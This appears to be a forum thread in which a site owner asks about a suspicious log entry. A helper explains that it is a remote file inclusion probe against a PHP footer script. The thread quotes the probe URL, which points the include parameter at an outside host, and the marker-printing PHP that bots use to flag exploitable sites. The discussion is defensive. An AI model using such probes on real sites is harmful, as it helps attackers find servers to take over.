Can this be hacked?

[crawlerbasher]

I was checking my log and noticed this url been entered.

 

mooglebook//footer.php?footer_file=http://networks.kpru.ac.th/list/respon1.txt?

 

This is the footer that it tryed to accsses.

 

</td>
      </tr>
    </table></td>
  </tr>
</table>
<p align="center"><strong>Crawlerbasher.NET © 2005 - 2009<br />
(c) 2001-2003 SQUARE   ENIX CO., LTD. All Rights Reserved. Title Design by Yoshitaka Amano.<br />
FINAL   FANTASY, TETRA MASTER and VANA'DIEL are registered trademarks of Square Enix   Co., Ltd. SQUARE ENIX, PLAYONLINE and the PlayOnline logo are trademarks of   Square Enix Co., Ltd.</strong></p>
</body>
</html>

 

Now can there actually try to hack the site with the html code that is in the footer of the php script?

 

[PFMaBiSmAd]

I think you missed the point of what that URL means. It has nothing to do with what code or html your footer is, it concerns getting your site to include and execute the code from the URL that was passed as a parameter to your code.

 

If your code is using an include/require statement and allow_url_fopen and/or allow_url_include is on (depending on php version), then the raw php code  in the ..../list/respon1.txt will get executed on your server. That code is -

 

<?php /* Fx29ID */ echo("FeeL"."CoMz"); die("FeeL"."CoMz"); /* Fx29ID */ ?>

 

which would output the the feelcomz string back to the bot script to signify that a site was found that could be taken over.

[crawlerbasher]

Well my hosting have alot of protection agnest this sort of thing.

 

And this just pops up with a 404 error.

 

Is there any way to protect my site from this, and also even though it seemed to have failed, should I still report this to my hosting provider?